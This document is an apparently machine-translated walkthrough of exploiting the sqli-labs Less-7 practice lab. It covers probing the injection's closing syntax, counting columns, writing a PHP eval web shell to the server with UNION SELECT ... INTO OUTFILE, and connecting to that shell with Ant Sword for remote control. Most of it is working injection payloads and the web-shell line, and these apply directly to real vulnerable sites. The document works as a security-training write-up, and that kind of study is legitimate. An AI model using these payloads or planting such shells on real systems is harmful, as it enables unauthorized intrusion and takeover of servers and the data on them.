#Main knowledge points

1.show variables like '%secure%'; used to check whether mysql has read and write permissions

If the parameter at this position is null, it means that the function of reading and writing files cannot be used

2. The file permission of the database specifies whether the database user has permission to write and read existing permissions in the operating system;

3. Into outfile command usage environment: You must know one, the full path of the folder on the server where files can be written

#File upload command

<?php @eval($_POST['x'])?> is a one-sentence Trojan horse

#File upload usage

The purpose is to upload a sentence Trojan horse to the server

1. You can directly use a one-sentence Trojan horse link in the directory of the website

2. If you find that the target website has a file containing a loophole, and at the same time, the database has the authority to write a one-sentence Trojan horse. Use file inclusion to directly include the file you wrote a sentence of Trojan horse. Maybe it is not in the root directory of our website, but it can be under any path of the website target server. We can use file inclusion to trigger our writing A word Trojan exploit.

#File upload command

?id=-1')) union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+

"<?php @eval($_POST['x']);?>" : The written content is a one-sentence Trojan horse, and x is the password reserved for using Ant Sword later

into outfile: function for writing or exporting

"D:\\phpStudy\\WWW\\: the path to write

haha.php: the file name of the generated file

Note: "<?php @eval($_POST['x']);?>" Like this function, we wrap it with double quotes outside, and the parameter x inside should not use double quotes anymore, but wrap it in, so as not to The machine does not recognize clearly

#case demo

sqli-labs-master/Less-7/

1. Judging the closing method

First throw a parameter in

The page shows: you are in...use outfile

digital test

url:?id=1 and 1=1

The page is normal you are in

url:?id=1 and 1=2

The page is displayed normally without error

If there is no protection, it is basically determined that he is a character type

Because of the character type, the background statement is

seletc * from database.tables where id='1 and 1=2' The injection statement will be treated as a string, and the function will not work

first test

Determine whether to use ' single quotes to enter and close

url:id=1'

Throw a ' into it, the page prompts an error report, but there is no error report content echoed

url:/?id=1' --+

Use --+ to comment out the following content. If the page shows you are in, it proves that he closed it with '.

But judging from the display of the page, he does not use ' single quotation marks to close

The second test (judging whether to use " double quotes to close)

url:?id=1" --+

The page shows you are in...

url:?id=1" and 1=2 --+

Using and 1=2, make sure again.

If the page is an error statement, use "double quotes to close.

Because guessing his sql statement

Because and 1=2 does not hold

Make sure you don't use " to close

But the page here still echoes you are in normally. Why?

Because he may be wrapped with ' 'single quotes, so you typed " was escaped by him

For example, his background original sql statement is

select *from database.table whre id='1'

Maybe after you type it, it becomes

select *from database.tables where id='1" --+'

Since it is wrapped in single quotes, it is possible that the "--+" you entered was filtered out by other systems or developed codes

The "--+" you entered is automatically filtered out for you, so the select you belong to *from database.tables where id='1 " --+ ' was messed up by himself later, and then restored to the original sql statement select *from database.table whre id='1'

Then the statement select *from database.table whre id='1' is normal, so the page is echoed normally

So we have to use and 1=1 and and 1=2 again to judge

Make a third test (using ') single quotes for parentheses)

url:?id=1') --+

The page still reports an error

Do a fourth test (use ") double quotes with parentheses)

url:?id=1”) --+

show you are in

url:?id=1”) and 1=2 --+

Confirm again with and 1=2

The page is still displayed normally you are in

Make a fifth test (use ')) double quotes plus parentheses)

url:?id=1')) --+

The page shows you are in normal

url:?id=1')) and 1=2 --+

Use and1=2 to judge again

Page error to determine the closing method'))

2. Query the number of fields (order by or group by)

url:?id=1')) group by 4 --+

page returns error

The page normally displays you are in without reporting an error

With this conclusion there are 3 fields

4. Write a sentence Trojan horse

url:

?id=-1')) union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+

Note: The written content can be written in that field, I am writing in 3, 2, 1 can be written

After execution, the website page will report an error, but it will not affect it. If your command statement is correct, then it will succeed.

At this time, a haha.php file is generated under the directory

Check the content, at this point our one-sentence code has been successfully written into it

5. Use Ant Sword to connect

Click on the .exe file

Right click on the blank space -> Add Data

The haha.php behind url: is the file name generated by writing a sentence of code earlier

x: It is also the parameter of the connection password we write in the back of a sentence

Click Test Connection -> Show Success

click to add

connection succeeded

The target server is equivalent to being remotely controlled by us

Because Xiaopi this program we give administrator privileges

Use whoami to determine if you have administrative privileges. Make sure to use administrator privileges, which means that this computer is basically operated by us, because administrator is the highest privilege